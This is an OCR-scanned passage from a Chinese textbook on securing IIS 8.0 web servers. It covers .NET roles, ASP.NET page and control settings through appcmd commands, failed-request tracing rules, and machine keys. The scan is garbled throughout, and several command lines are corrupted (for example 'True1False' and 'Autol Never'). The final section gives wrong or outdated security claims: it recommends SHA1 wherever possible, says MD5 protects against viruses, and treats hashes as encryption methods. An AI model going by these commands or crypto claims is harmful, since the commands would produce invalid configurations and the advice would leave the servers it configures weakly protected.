提供 程序 适用 于 大 中 型 Intemet 应 用 程序 ， 它 是 默认 的 提供 程序 。 

口 Windows (AspNetWindowsTokenRoleProvider) 角色 信息 基于 Windows 账户 (用 
户 和 组 ) 。 只 有 应 用 程序 在 所 有 用 户 拥有 域 账户 的 网 络 中 运行 时 ，Windows 提供 
程序 才 是 有 用 的 。 
设置 提供 程序 步骤 如 下 : 

(1) 打开 ITS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “.NET 角色 ”项 。 

(3) 在 “操作 ” 窗 格 中 ， 单 击 “ 设 置 默认 提供 程序 ”按钮 。 

(4) 在 “编辑 NET 角色 设置 ”对 话 框 中 ， 从 “默认 提供 程序 ”下 拉 列 表 中 选择 一 个 提 

供 程序 ， 然 后 单 击 “ 确 定 ” 按 钮 。 


7. 查看 .NET 角 色 用 户 


当 要 了 解 与 特定 角色 关联 的 用 户 时 ， 就 需要 查看 .NET 角色 用 户 。 步 又 如 下 : 
(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “.NET 角色 ”项 。 

(3) 选择 要 查看 其 用 户 列 表 的 角色 。 

(4) 在 “操作 ” 窗 格 中 ， 单 击 “ 查 看 用 户 ” 按 钮 。 








14.4.2 页面 和 控件 设置 


ASP.NET 页 面包 括 一 些 在 运行 时 可 由 ASP.NET 识别 并 处 理 的 额外 元 素 ， 除 此 以 外 ， 
ASP.NET 页 面 还 可 以 包含 可 重用 的 自 定义 控件 ， 这些 自 定义 控件 由 服务 器 进行 处 理 ， 使 用 
服务 器 代码 来 设置 ASP.NET 页 面 的 属性 。 

IIS 8.0 允许 设置 以 下 ASP.NET 页 面 和 用 户 控件 属性 : 

口 行为 : 在 当前 页 面 请 求 结束 时 ， 该 页 面 是 否 保 留 自身 及 其 包含 的 所 有 服务 器 控件 
的 视图 状态 。 
常规 ， 包 括 在 所 有 页 中 的 命名 空间 。 
编译 : 是 编译 还 是 解释 页 面 。 
服务 : 是 否 启 用 会 话 状态 。 


1. 页面 和 控件 的 自 定义 设置 


OO 


IIS 8.0 为 ASPNET 页 面 和 控件 提供 了 默认 设置 ， 但 可 以 根据 需要 进行 更 改 。 例 如 ， 
可 以 设置 站 点 的 主 控 页 文件 或 启用 视图 状态 。 设 置 步骤 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 页 面 和 控件 ”项 。 

(3) 在 “页 面 和 控件 ”页 中 ， 根 据 需 要 编辑 设置 。 

(4) 完成 后 在 “操作 ” 窗 格 中 单 击 “ 应 用 ”按钮 。 

此 外 ， 也 可 以 通过 命令 行 方式 进行 设置 ， 具 体 做 法 如 下 : 





= 
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1) 启用 或 禁用 页 面 输出 缓冲 
若 要 启用 或 禁用 页 面 输出 缓冲 ， 请 使 用 如 下 语法 : 


appcmd set config /commit:WebROOT /section:pages /buffer:True1False 


变量 buffer:True 用 于 启用 页 面 输出 缓冲 ， 默 认 值 为 True。 
2) 指定 主 控 页 文件 
车 要 指定 主 控 页 文件 ， 请 使 用 如 下 语法 : 


appcmd set config /commit:WebROOT /section:pages /masterPageFile:string 


变量 string 是 主 控 页 文件 名 称 。 
3) 指定 样式 表 主 题 
车 要 指定 应 用 于 页 面 的 样式 表 ， 请 使 用 如 下 语法 : 


appcmd set config /commit:WebROOT /section:pages /styleSheetTheme:string 


变量 string 是 样式 表 名 称 。 
4) 指定 页 面 主题 
若 要 指定 用 于 配置 文件 范围 内 页 面 的 主题 名 称 ， 请 使 用 如 下 语法 : 


appcmd set config /commit:WebROOT /section:pages /theme:string 


变量 string 是 主题 名 称 。 

5) 启用 或 禁用 经 过 身份 验证 的 视图 状态 

着 要 启用 或 禁用 在 从 客户 端 回 传 页 面 时 对 视图 状态 进行 消息 验证 检查 的 功能 ， 请 使 用 
如 下 语法 : 

appcmd set config /commit:WebROOT /section:pages /enableViewStateMac : 

TruelFalse 


变量 enableViewStateMac:True 用 于 启用 经 过 身份 验证 的 视图 状态 ， 默 认 值 为 True。 

6) 启用 或 禁用 视图 状态 

若 要 启用 或 禁用 某 一 页 面 或 页 面 中 包含 的 任何 服务 器 控件 的 视图 状态 ， 请 使 用 如 下 
语法 : 

appcmd set config /commit:WebROOT /section:pages /enableViewState: 

TruelFalse 

变量 enableViewState:True 用 于 启用 页 面 的 视图 状态 ， 默 认 值 为 True。 

7) 设置 页 面 状态 字段 的 最 大 长 度 

若 要 设置 页 面 状 态 字段 的 最 大 长 度 ， 请 使 用 如 下 语法 : 


appcmd set config /commit:WebROOT /section:pages /maxPageStateFieldLength:int 


变量 int 是 页 面 状态 字段 的 最 大 长 度 。 其 值 为 正 数 时 ， 发 送 到 浏览 器 的 视图 状态 字段 
将 拆 分 成 若干 段 ， 所 有 段 的 总 和 等 于 所 设置 的 最 大 长 度 。 其 值 如 果 为 负数 ， 则 表示 视图 状 
态 不 应 拆 分 为 若干 段 ， 默 认 值 为 -1。 

8) 指定 页 面 的 代码 隐藏 类 

若 要 指定 .aspx 页 面 继承 的 代码 隐藏 类 ， 请 使 用 如 下 语法 : 


appcmd set config /commit:WebROOT /section:pages /pageBaseType:string 
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变量 string 是 .aspx 页 面 的 代码 隐藏 类 的 名 称 ， 默 认 值 为 System.Web.UIPage。 

9) 指定 控件 的 代码 隐藏 类 

若 要 指定 用 户 控件 继承 的 代码 隐藏 类 ， 请 使 用 如 下 语法 : 

appcmd set config /commit:WebROOT /section:pages /userControlBaseType: 
string 

变量 string 是 用 户 控件 的 代码 隐藏 类 的 名 称 ， 默 认 值 为 System.Web.ULUserControl。 
10) 设置 编译 模式 

若 要 指定 是 编译 页 面 还 是 解释 页 面 ， 请 使 用 如 下 语法 : 


appcmd set config /commit:WebROOT /section:pages /compilationMode:Autol 
Never |Always 


变量 compilationMode:Auto 将 ASPNET 设置 为 默认 时 不 编译 页 面 。 变 量 
compilationMode:Never 将 ASPNET 设置 为 永 不 动态 编译 页 面 。 如 果 某 一 页 面包 含 需要 编 
译 的 脚本 块 或 代码 构造 ，ASPNET 将 返回 错误 ， 该 页 面 将 无 法 运行 。 变 量 
compilationMode:Always 将 ASPNET 设置 为 始终 编译 页 面 ， 默 认 值 为 True。 

11) 添加 命名 空间 

若 要 疝 在 预 编译 期 间 使 用 的 命名 空间 集合 添加 命名 空间 ， 请 使 用 如 下 语法 : 


appcmd set config /commit:WebROOT /section:pages /+"[namespace="'string']" 


变量 string 是 要 添加 到 此 集合 中 的 命名 空间 。 
12) 删除 命名 空间 
若 要 从 预 编 译 期 间 使 用 的 命名 空间 集合 中 删除 命名 空间 ， 请 使 用 如 下 语法 : 


appcmd set config /commit:WebROOT /section:pages /-" [namespace='string']" 


变量 string 是 要 从 此 集合 中 删除 的 命名 空间 。 

13) 启用 或 禁用 会 话 状态 

若 要 启用 或 禁用 会 话 状态 ， 请 使 用 如 下 语法 : 

appcmd set config /commit:WebROOT /section:pages /enableSessionState:Truel 
False1Readonly 





变量 enableViewState:ReadOnly 表示 会 话 状态 为 只 读 ， 默 认 值 为 True。 

14) 启用 或 禁用 请 求 验证 

若 要 允许 或 禁止 检查 来 自 浏览 器 的 所 有 输入 是 否 包 含 存 在 潜在 危险 的 内 容 ， 请 使 用 如 
下 语法 : 

appcmd set config /commit:WebROOT /section:pages /validateRequest:TruelFalse 

变量 validateRequest:True 表示 启用 请 求 验证 ， 默 认 值 为 True。 

需要 注意 的 是 ,在 IS 8.0 中 使 用 Appcmd.exe 在 全 局 级 别 配 置 <pages> 元 素 时 ， 必 须 在 
命令 中 指定 /commit:WebROOT， 保 证 对 根 web.config 文件 而 不 是 ApplicationHost.config 文 
件 进行 更 改 。 

2. 配置 自 定义 控件 


Web 自 定义 控件 是 一 种 已 编辑 组 件 ， 在 服务 器 上 运行 ， 可 将 用 户 界 面 及 其 他 相关 功能 


a 
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封装 到 可 重用 的 包 中 。IIS 8.0 可 以 为 Web 自 定义 控件 指定 标记 前 级 /命名 空间 映射 。 

1) 查看 自 定义 控件 列表 

若 要 轻松 管理 自 定 义 控件 ， 查 看 包含 特定 配置 级 别 的 所 有 自 定义 控件 的 列表 是 必 不 可 
少 的 ， 我 们 可 以 按 标记 前 级 、 源 、 程 序 集 或 者 按 范围 (本 地 或 继承 ) 对 此 列表 进行 排序 。 
此 外 可 以 按 范围 对 控件 进行 分 组 ， 以 便 快速 查看 哪些 自 定义 控件 适用 于 当前 配置 级 别 ， 以 
及 哪些 自 定 义 控 件 是 从 父 级 继承 而 来 的 。 查 看 自 定 义 控件 列表 步 又 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 页 面 和 控件 ”项 。 

(3) 在 “操作 ” 窗 格 中 ， 单 击 “ 注 册 控件 ”按钮 。 

(4) 若 要 快速 查看 哪些 控件 是 自 定义 控件 ， 请 从 “分 组 依据 ”下 拉 列 表 中 选择 “控件 
类 型 ”项 。 

2) 添加 自 定义 控件 

如 果 要 为 自 定义 控件 指定 标记 前 级 /命名 空间 映射 ， 就 需要 添加 该 自 定义 控件 。 这 里 需 
要 注意 ， 添 加 配置 设置 时 会 在 本 地 级 别 以 及 继承 该 设置 的 所 有 子 级 别 中 添加 该 设置 ， 步 又 
如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 页 面 和 控件 ”项 。 

(3) 在 “操作 ” 窗 格 中 ， 单 击 “ 注 册 控 件 ” 按 钮 。 

(4) 在 “操作 ” 窗 格 中 ， 单 击 “ 添 加 自 定义 控件 ”按钮 。 

(5) 在 “添加 自 定义 控件 ”对 话 框 的 “标记 前 级 ”文本 框 中 ， 输 入 一 个 标记 前 级 。 

(6) 在 “命名 空间 ”文本 框 中 ， 输 入 该 自 定义 控件 所 属 的 命名 空间 ， 这 是 在 应 用 程序 
代码 中 指定 的 命名 空间 。 

(7) 在 “程序 集 ” 文 本 框 中 输入 该 自 定 义 控件 的 源 文件 或 程序 集 ， 单 击 “ 确 定 ” 按 钮 。 

3) 编辑 自 定义 控件 

当 本 地 自 定义 控件 的 前 级 、 命名 空间 或 程序 集 发 生 更 改 时 , 就 需要 编辑 该 自 定义 控件 。 
编辑 配置 设置 将 更 改 本 地 级 别 以 及 继承 该 设置 的 所 有 子 级 别 的 设置 ， 步 又 如 下 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 页 面 和 控件 ”项 。 

(3) 在 “操作 ” 窗 格 中 ， 单 击 “ 注 册 控件 ”按钮 。 

(4) 在 “控件 ”页 上 ， 选 择 要 更 改 的 控件 ， 在 “操作 ” 窗 格 中 单 击 “ 编 辑 ” 按 钮 。 

(5) 若 要 更 改 标记 前 级 ， 请 在 “编辑 自 定义 控件 ”对 话 框 的 “标记 前 级 ”文本 框 中 ， 
输入 一 个 新 的 标记 前 级 。 

(6) 车 要 更 改 命名 空间 ， 请 在 “命名 空间 ”文本 框 中 输入 一 个 新 命名 空间 。 

(7) 若 要 更 改 程序 集 ， 在 “程序 集 ” 文 本 框 中 输入 该 自 定义 控件 的 源 文件 或 程序 集 的 
名 称 ， 单 击 “ 确 定 ” 按 钮 。 

4) 删除 自 定义 控件 

如 果 在 应 用 程序 中 不 再 使 用 某 一 自 定义 控件 ， 则 可 以 将 它 删除 。 既 可 以 删除 本 地 级 别 
的 自 定 义 控件 ， 也 可 以 删除 继承 自 父 级 别 的 自 定义 控件 ， 步 又 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 页 面 和 控件 ”项 。 
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(3) 在 “操作 ” 窗 格 中 ， 单 击 “ 注 册 控 件 ” 按 钮 。 
(4) 在 “控件 ”页 上 ， 选 择 要 删除 的 自 定义 控件 ， 单 击 “ 操 作 ” 窗 格 中 的 “删除 ” 按 
钮 ， 然 后 单 击 “ 确 定 ” 按 钮 。 





14.4.3 ”监控 Web 系统 安全 


利用 IIS 8.0 的 失败 请 求 跟踪 功能 ， 可 以 在 出 现 问题 时 捕获 相应 的 XML 格式 的 日 志 ， 
从 而 无 需 重 现 该 问题 即 可 故障 排除 。 此 外 ， 可 以 定义 应 用 程序 的 失败 条 件 并 配置 基于 URL 
记录 的 跟踪 事件 。 
失败 请 求 跟踪 功能 可 以 在 两 个 级 别 进行 配置 : 
口 在 站 点 级 别 ， 可 以 启用 或 禁用 跟踪 并 配置 日 志文 件 设置 。 
口 在 应 用 程序 级 别 ， 可 以 指定 捕获 跟踪 事件 时 的 失败 条 件 ， 同 时 还 可 以 配置 应 在 日 
志文 件 条 目 中 捕获 的 跟踪 事件 。 


1.， 查看 失败 请 求 跟踪 规则 的 列表 


若 要 管理 失败 请 求 的 跟踪 规则 ， 查 看 包含 特定 配置 级 别 所 有 失败 请 求 跟踪 规则 的 列表 
是 非常 必要 的 ， 我 们 可 以 按 路 径 、 关 联 的 跟踪 提供 程序 、HTTP 状态 代码 、 处 理 请 求 所 用 
的 时 间或 范围 (本 地 或 继承 〉 对 该 列表 进行 排序 。 此 外 ， 还 可 以 按 范 围 对 规则 进行 分 组 ， 
以 便 快 速 查 看 哪些 规则 适用 于 当前 配置 级 别 ， 以 及 哪些 规则 是 从 父 级 继承 而 来 的 。 查 看 步 
又 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 失 败 请 求 跟踪 规则 ”项 。 

此 外 也 可 以 通过 命令 行 方式 实现 查看 ， 如 果 要 查看 失败 请 求 跟踪 规则 的 列表 ， 使 用 如 
下 语法 : 

appcmd configure trace "string" 

变量 string 是 查看 失败 请 求 跟踪 规则 列表 的 站 点 名 称 。 

2. 启用 失败 请 求 跟踪 日 志 记 录 


如 果 希 望 IS 记录 有 关 未 能 提供 站 点 或 应 用 程序 内 容 的 请 求 的 信息 ， 就 可 以 启用 针对 
失败 请 求 的 跟踪 日 志 记 录 。 在 启用 记录 后 , IIS 将 提供 有 针对 性 的 日 志 , 无 需 再 从 充满 无 关 
日 志 条 目的 列表 中 费力 查找 ， 即 可 找到 失败 的 请 求 ， 而 且 我 们 也 无 需 重 现 错误 就 可 解决 它 
们 。 跟 踪 日 志 记 录 可 以 配置 以 下 内 容 : 

口 日 志文 件 的 位 置 ; 

口 要 保留 的 最 大 日 志文 件数 ; 

口 日 志文 件 的 最 大 容量 。 

启用 步骤 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “连接 ” 窗 格 中 ， 单 击 “ 网 站 ”按钮 。 

(3) 在 “功能 视图 ”中 ， 选 择 要 启用 跟踪 日 志 记 录 的 站 点 。 











"De 





无 懈 可 击 一 一 全 方位 构建 安全 Web 系统 


(4) 在 “操作 ” 窗 格 的 “配置 ”下 ， 单 击 “ 失 败 请 求 跟踪 ”按钮 。 

(5) 在 “编辑 网 站 失败 请 求 跟踪 设置 ”对 话 框 中 ， 单 击 “ 启 用 ”按钮 ， 为 该 站 点 启用 
日 志 记录 。 

(6) 在 “目录 ”文本 框 中 ， 输 入 要 用 于 存储 日 志文 件 的 路 径 ， 或 单 击 “ 浏 览 ” 按 钮 在 
计算 机 上 查找 所 需 的 位 置 ， 默 认 路 径 为 %SystemDrive%\inetpub\logs\FailedReqLogFiles。 建 
议 将 日 志文 件 ( 如 失败 请 求 跟 踪 的 日 志文 件 ) 存储 在 systemroot 之 外 的 目录 中 。 

(7) 在 “跟踪 文件 的 最 大 数量 ”文本 框 中 ， 输 入 要 保留 的 跟踪 日 志文 件 的 最 大 数量 ， 
然后 单 击 “确定 ”按钮 。 


3. 禁用 失败 请 求 跟踪 日 志 记 录 


当 不 再 需要 跟踪 对 站 点 或 站 点 上 应 用 程序 的 失败 请 求 时 ， 可 禁用 针对 失败 请 求 的 跟踪 
日 志 记 录 。 禁用 跟踪 日 志 记录 后 , ITS 不 再 创建 跟踪 日 志 来 记录 针对 该 站 点 的 、 按 照 失败 定 
义 界 定 为 失败 的 任何 请 求 ， 步 又 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “连接 ” 窗 格 中 ， 单 击 “ 网 站 ”按钮 。 

(3) 在 “功能 视图 ”中 ， 单 击 禁用 跟踪 日 志 记录 的 站 点 。 

(4) 在 “操作 ” 窗 格 的 “配置 ”下 ， 单 击 “ 失 败 请 求 跟踪 ”按钮 。 

(5) 在 “编辑 网 站 失败 请 求 跟 踪 设 置 ”对 话 框 中 ， 清 除 “ 启 用 ”按钮 ， 然 后 单 击 
“确定 ”按钮 。 


4. 为 失败 请 求 创建 跟踪 规则 


如 果 向 服务 器 发 送 的 某 一 请 求 失败 或 耗费 过 长 时 间 ， 可 以 定义 一 个 失败 请 求 跟踪 规 
则 ， 此 规则 将 捕获 此 请 求 的 跟踪 事件 并 在 这 些 跟踪 事件 发 生 时 将 其 记 入 日 志 ， 而 无 须 对 错 
误 进 行 重 现 。 只 有 当 请 求 超出 了 分 配 的 时 间 间 隔 ， 或 为 响应 生成 了 指定 的 HTTP 状态 和 子 
状态 代码 组 合 时 ， 才 将 事件 写 入 跟踪 日 志 中 。 跟 踪 日 志 只 包含 特定 失败 请 求 的 信息 ， 这 样 
无 须 再 查阅 包含 每 个 请 求 的 大 型 日 志文 件 ， 即 可 找到 所 需 的 有 关 特 定 失 败 请 求 的 信息 。 

需要 注意 的 是 ， 必 须 先 启 用 跟踪 日 志 记 录 ， 然 后 才能 为 失败 的 请 求 创建 跟踪 日 志 。 添 
加 配置 设置 时 ， 会 在 本 地 级 别 以 及 继承 该 设置 的 所 有 子 级 别 中 添加 该 设置 。 步 又 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 失 败 请 求 跟踪 规则 ”项 。 

(3) 在 “失败 请 求 跟踪 规则 ”页 中 ， 单 击 “ 操 作 ” 窗 格 中 的 “添加 ”按钮 。 

(4) 在 “添加 失败 请 求 跟踪 规则 ”对 话 框 的 “指定 要 跟踪 的 内 容 ” 区 域 中 ， 选 择 如 
下 项 : 





所 有 内 容 (*) : 跟踪 目录 中 的 所 有 文件 。 

ASPNET (*.aspx) : 跟踪 目录 中 的 所 有 .aspx 文件 。 

ASP (*.asp) : 跟踪 目录 中 的 所 有 .asp 文件 。 

自 定义 一 为 某 一 自 定义 内 容 集 (如 xyz.exe 或 *.jpg) 进行 失败 跟踪 。 它 最 多 只 能 包 
含 一 个 通配符 ， 并 且 必 须 位 于 设置 失败 请 求 定义 的 目录 内 。 

(5) 单 击 “ 下 一 步 ” 按 钮 。 

(6) 在 “添加 失败 请 求 跟踪 规则 ”对 话 框 的 “定义 跟踪 条 件 ” 区 域 中 ， 选 择 以 下 一 个 
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或 多 个 条 件 进行 跟踪 : 


序 ” 


度 


口 状态 代码 :输入 要 跟踪 的 状态 代码 。 可 以 在 该 列表 中 输入 多 个 以 逗号 分 隔 的 状态 

代码 ， 还 可 以 使 用 子 状态 代码 来 细 分 状态 代码 ， 如 “404.2，500”。 

口 所 用 时 间 : 输入 请 求 花费 的 最 长 时 间 〈 以 秒 为 单位 ) 。 

口 事件 严重 性 : 从 “事件 严重 性 ”下 拉 列 表 中 选择 要 跟踪 的 严重 性 级 别 。 可 以 选择 
“错误 ”、“ 严 重 错误 ”或 “警告 ”。 

如 果 指 定 了 上 述 所 有 条 件 ， 则 满足 第 一 个 条 件 时 生成 跟踪 日 志文 件 。 

(7) 单 击 “ 下 一 步 ” 按 钮 。 

(8) 在 “添加 失败 请 求 跟踪 规则 ”对 话 框 的 “选择 跟踪 提供 程序 ”区 域 中 的 “提供 程 

下 ， 选 择 以 下 一 个 或 多 个 跟踪 提供 程序 : 

口 ASP: 跟踪 ASP 请 求 的 执行 操作 的 开始 和 完成 。 

口 ASPNET: 查看 请 求 转 入 和 转 出 托管 代码 的 情况 。 这 包括 *.aspx 请 求 。 

口 ISAPI 扩展 : 跟踪 请 求 转 入 和 转 出 ISAPI 扩展 进程 的 情况 。 

口 WWW 服务 器 : 通过 ITS 工作 进程 跟踪 请 求 。 

(9) 在 “添加 失败 请 求 跟踪 规则 ”对 话 框 的 “选择 跟踪 提供 程序 ”区 域 中 的 “详细 程 

下 ， 选 择 以 下 一 种 或 多 种 详细 级 别 : 

口 常规 : 提供 请 求 活动 上 下 文 的 信息 ， 如 将 请 求 的 URL 和 谓词 记 入 日 志 的 
GENERAL REQUEST_START 事件 。 

口 严重 错误 : 提供 导致 进程 退出 或 即将 导致 进程 退出 操作 的 相关 信息 。 

口 错误 : 提供 遇 到 错误 并 且 无 法 继续 处 理 请 求 的 组 件 的 相关 信息 。 这 些 错 误 通 常 只 
是 服务 器 端 问题 。 

口 警告 ， 提 供 遇 到 错误 但 可 以 继续 处 理 请 求 的 组 件 的 相关 信息 。 

口 信息 : 提供 请 求 的 一 般 信 息 。 

口 详细 : 提供 请 求 的 详细 信息 ， 这 是 默认 选项 。 

(10) 如 果 在 步骤 (8) 中 选择 了 ASPNET 跟踪 提供 程序 ， 在 “添加 失败 请 求 跟踪 规 











则 ”对 话 框 “选择 跟踪 提供 程序 ”区 域 中 的 “区 域 ” 下 ， 选 择 此 提供 程序 要 跟踪 的 以 下 一 
个 或 多 个 功能 区 域 : 


口 结构 :跟踪 主要 进入 和 离开 ASP.NET 结构 的 各 个 部 分 相关 的 事件 。 

口 模块 : 跟踪 请 求 进入 和 离开 各 个 HITP 管道 模块 时 记录 的 事件 。 

口 页 生成 与 执行 特定 ASPNET 页 相关 事件 (如 Page Load 等 ) 对 应 的 跟踪 事件 。 
口 AppServices: 跟踪 记录 应 用 程序 服务 功能 事件 。 

(11) 如 果 在 步骤 (8) 中 选择 了 “WWW 服务 器 ”跟踪 提供 程序 ， 在 “添加 失败 请 求 


跟踪 规则 ”对 话 框 “选择 跟踪 提供 程序 ”区 域 中 的 “区 域 ” 下 ， 选 择 此 提供 程序 要 跟踪 的 
以 下 一 个 或 多 个 功能 区 域 : 





口 身份 验证 : 跟踪 身份 验证 尝试 ， 如 跟踪 已 通过 身份 验证 的 用 户 名 、 身 份 验 证 方案 
(匿名 、 基 本 等 ) 以 及 结果 (成 功 、 失 败 、 错 误 等 )。 

口 安全 性 : 在 IIS 服务 器 与 安全 有 关 的 原因 拒绝 请 求 ( 例 如， 拒绝 客户 端 访问 资源 的 
请 求 ) 的 情况 下 生成 的 跟踪 事件 。 

口 筛选 器 : 确定 ISAPI 筛选 器 处 理 请 求 所 用 时 间 。 

口 StaticFile: 跟踪 完成 静态 文件 请 求 所 用 时 间 。 
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CGI: 在 请 求 针对 CGI 文件 情况 下 生成 跟踪 事件 。 

压缩 : 在 响应 为 压缩 响应 的 情况 下 生成 跟踪 事件 。 

缓存 : 为 与 请 求 关 联 的 缓存 操作 生成 跟踪 事件 。 

RequestNotifications: 在 进入 和 退出 时 捕获 所 有 请 求 通知 。 

模块 : 跟踪 在 请 求 进入 和 离开 HTTP 管道 模块 时 记 入 日 志 的 事件 ， 或 捕获 托管 模 
块 的 跟踪 事件 。 

(12) 单 击 “ 完 成 ”按钮 。 


5 编辑 失败 请 求 跟踪 规则 


当 要 更 改 规则 的 失败 定义 或 要 收集 有 关 失 败 请 求 的 其 他 信息 时 ， 可 更 改 失败 请 求 跟踪 
设置 ， 步 又 如 下 : 

(1) 打开 IIS 管理 器 ， 然 后 导航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 失 败 请 求 跟踪 规则 ”项 。 

(3) 在 “失败 请 求 跟踪 规则 ”页 中 ， 单 击 要 更 改 的 规则 ， 然 后 单 击 “ 操 作 ” 窗 格 中 的 
“编辑 ”按钮 。 

(4) 在 “指定 要 跟踪 的 内 容 ” 对 话 框 中 ， 单 击 “ 下 一 步 ” 按 钮 。 

(5) 在 “定义 跟踪 条 件 ” 对 话 框 中 执行 以 下 一 项 或 多 项 操作 : 

口 在 “状态 代码 ”文本 框 中 更 改 状 态 代码 ， 以 便 跟 踪 更 改 后 的 状态 代码 的 失败 情况 。 

口 更 改 “ 所 用 时 间 〈 秒 ) ”， 在 “所 用 时 间 ( 秒 ) ”文本 框 中 输入 时 间 间 隔 。 

口 通过 从 “事件 严重 性 ”下 拉 列 表 中 选择 新 的 严重 性 来 更 改 事 件 严 重 性 ， 然 后 单 击 

“下 一 步 ” 按 钮 。 

(6) 在 “选择 跟踪 提供 程序 ”对 话 框 中 执行 以 下 一 项 或 多 项 操作 以 更 改 提供 程序 : 

口 如 果 要 将 IIS 配置 为 跟踪 ASP 请 求 ， 单 击 ASP 按钮 。 

口 如 果 要 将 IS 配置 为 跟踪 ASP.NET 请 求 ， 单 击 ASPNET 按钮 。 

口 如 果 要 将 IS 配置 为 跟踪 WWW 服务 器 请 求 ， 单 击 “WWW 服务 器 ”按钮 。 

口 如 果 要 将 IIS 配置 为 跟踪 ISAPI 请 求 ， 单 击 “ISAPI 扩展 ”按钮 。 

(7) 单 击 某 一 提供 程序 ， 更 改 其 详细 级 别 。 

(8) 在 “提供 程序 属性 ”下 的 “详细 程度 ”下 拉 列 表 中 ， 单 击 一 个 详细 级 别 。 

(9) 对 于 在 “选择 跟踪 提供 程序 ”对 话 框 中 选择 并 且 更 改 其 详细 级 别 的 提供 程序 ， 重 
复 执行 步骤 (7) 和 (8) 。 

(10) 单 击 某 一 提供 程序 ， 更 改 希望 其 跟踪 的 区 域 。 

(11) 在 “区 域 ” 下 ， 选 择 希望 提供 程序 跟踪 的 区 域 。 

(12) 对 于 在 “选择 跟踪 提供 程序 ”对 话 框 中 选择 并 且 更 改 其 跟踪 区 域 的 提供 程序 ， 
EE 复 执行 步骤 (10) 和 (11) 。 

(13) 单 击 “ 完 成 ”按钮 。 


6. 删除 失败 请 求 跟踪 规则 


如 果 不 再 需要 跟踪 特定 的 失败 请 求 ， 可 以 删除 失败 请 求 的 跟踪 规则 。 我 们 既 可 以 删除 
本 地 级 别 的 失败 请 求 跟踪 规则 , 也 可 以 删除 继承 自 父 级 别 的 失败 请 求 跟踪 规则 。 步骤 如 下 。 
(1) 打开 IS 管理 器 ， 导 航 至 要 管理 的 级 别 。 
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(2) 在 “功能 视图 ”中 ， 双 击 “ 失 败 请 求 跟踪 规则 ”项 。 
(3) 在 “失败 请 求 跟踪 规则 ”选项 卡 中 ， 选 中 要 删除 的 跟踪 规则 。 
(4) 在 “操作 ” 窗 格 中 ， 单 击 “ 删 除 ” 按 钮 ， 单 击 “ 确 定 ” 按 钮 。 


14.4.4 ”安全 密 钥 配置 


计算 机 密 钥 有 助 于 保护 Forms 数据 、 身份 验 证 Cookie 数据 和 页 级 视图 状态 数据 , 密 钥 
还 可 以 用 于 验证 进程 外 会 话 状态 标识 。ASP.NET 使 用 以 下 类 型 的 计算 机 密 钥 : 
口 验证 密 钥 : 用 于 计算 消息 验证 代码 以 确认 数据 的 完整 性 。 此 密 钥 附 加 到 Forms、 身 
份 验证 Cookie 或 特定 页 的 视图 状态 。 
口 解密 密 钥 : 用 于 对 Forms 身份 验证 票证 和 视图 状态 进行 加 密 和 解密 。 
配置 安全 密 钥 分 为 以 下 步骤 : 


1. 生成 计算 机 密 钥 


(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 ; 

(2) 在 “功能 视图 ”中 ， 右 击 “ 计 算 机 密 钥 ”项 ， 然 后 在 弹出 的 快捷 菜单 中 选择 “ 打 
开 功能 ”命令 。 

(3) 在 “计算 机 密 钥 ”选项 卡 上 ， 从 “加 密 方法 ”下 拉 列 表 中 选择 一 种 加 密 方法 ， 默 
认为 SHA1。 

(4) 从 “解密 方法 ”下 拉 列 表 中 选择 一 种 解密 方法 ， 默 认为 “自动 ”; 此 外 ， 也 可 以 
配置 验证 密 钥 和 解密 密 钥 的 设置 。 

(5) 在 “操作 ” 窗 格 中 ， 单 击 “ 生 成 密 钥 ”按钮 ， 单 击 “ 应 用 ”按钮 。 


2. 选择 加 密 方 法 


选择 良好 的 计算 机 密 钥 加 密 方法 可 以 增强 创建 的 计算 机 密 钥 安全 性 ， 可 供 选 择 的 加 密 

方法 如 下 : 

口 高 级 加 密 标准 (Advanced Encryption Standard，AES) : 这 种 加 密 方 法 实现 起 来 相 
对 容易 一 些 ， 并 且 只 需要 很 少 的 内 存 ，AES 的 密 钥 大 小 为 128、192 或 256 位 。 此 
方法 使 用 相同 的 私 钥 对 数据 进行 加 密 和 人 解密， 而 公 钥 方法 必须 使 用 成 对 的 密 钥 。 

口 Message Digest Algorithm 5: 用 于 对 应 用 程序 (如 邮件 〉 进 行 数字 签名 。 此 方法 将 
产生 128 位 的 哈 希 数据 。MD5 可 以 提供 保护 ， 以 防止 遭受 计算 机 病毒 和 某 些 程序 
〈 看 上 去 像 是 无 害 的 应 用 程序 ， 而 实际 上 具有 破坏 性 ) 的 攻击 。 

口 安全 哈 希 算法 (Secure Hach Algorithml, SHA1) : 它 是 默认 加 密 方法 ， 被 认为 比 
MDS5 更 加 安全 , 因为 它 产生 160 位 的 消息 摘要 , 我 们 应 该 尽 可 能 使 用 SHA1 加 密 。 

口 三 重 数据 加 密 标 准 〈Triple Data Encryption Standard，Triple DES) : 它 与 数据 加 密 
标准 (DES) 稍 有 不 同 。 它 的 速度 比 普通 DES 慢 三 倍 ， 但 是 它 更 加 安全 ， 因 为 它 
